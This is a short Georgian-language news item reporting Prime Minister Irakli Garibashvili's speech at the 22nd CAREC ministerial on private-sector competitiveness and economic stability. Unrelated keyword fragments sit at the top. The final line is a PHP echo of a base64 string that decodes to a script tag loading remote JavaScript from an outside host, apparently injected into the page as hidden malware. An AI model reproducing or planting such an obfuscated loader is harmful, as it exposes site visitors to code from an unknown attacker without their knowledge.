celsiusi
ავერსი საქკაბელი

 ჩვენი მთავრობა აქცენტს აკეთებს კერძო სექტორის კონკურენტუნარიანობის ამაღლებაზე, - ამის შესახებ პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა ცენტრალური აზიის რეგიონული ეკონომიკური თანამშრომლობის (CAREC) რიგით 22-ე მინისტერიალზე სიტყვით გამოსვლისას განაცხადა.

„მჯერა, რომ რეგიონში საქართველოს უნიკალური როლის გათვალისწინებით, საქართველოს ეკონომიკა შეუწყობს ხელს საერთო რეგიონალურ კეთილდღეობას. ჩვენი მთავრობა აქცენტს აკეთებს კერძო სექტორის კონკურენტუნარიანობის ამაღლებაზე, ღირებულებების გლობალურ ჯაჭვში ქვეყნის ინტეგრირებაზე, ბიზნესის ხელსაყრელი გარემოს შენარჩუნებაზე და ქვეყნის სატრანზიტო და განახლებადი ენერგიების პოტენციალის გამოყენებაზე. ჩვენი თანმიმდევრული პოლიტიკის შედეგად საქართველომ შეინარჩუნა ეკონომიკური სტაბილურობა რეგიონული, გლობალური გამოწვევის მიუხედავად“, - განაცხადა პრემიერმა და მთავრობის წარმატების ერთ-ერთ მაჩვენებლად ეკონომიკური ზრდის ტემპის დადებითი მაჩვენებლების შენარჩუნება დაასახელა.

პრემიერმა ღონისძიების მონაწილეებს საქართველოს ეკონომიკური მაჩვენებლები გააცნო.

254
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");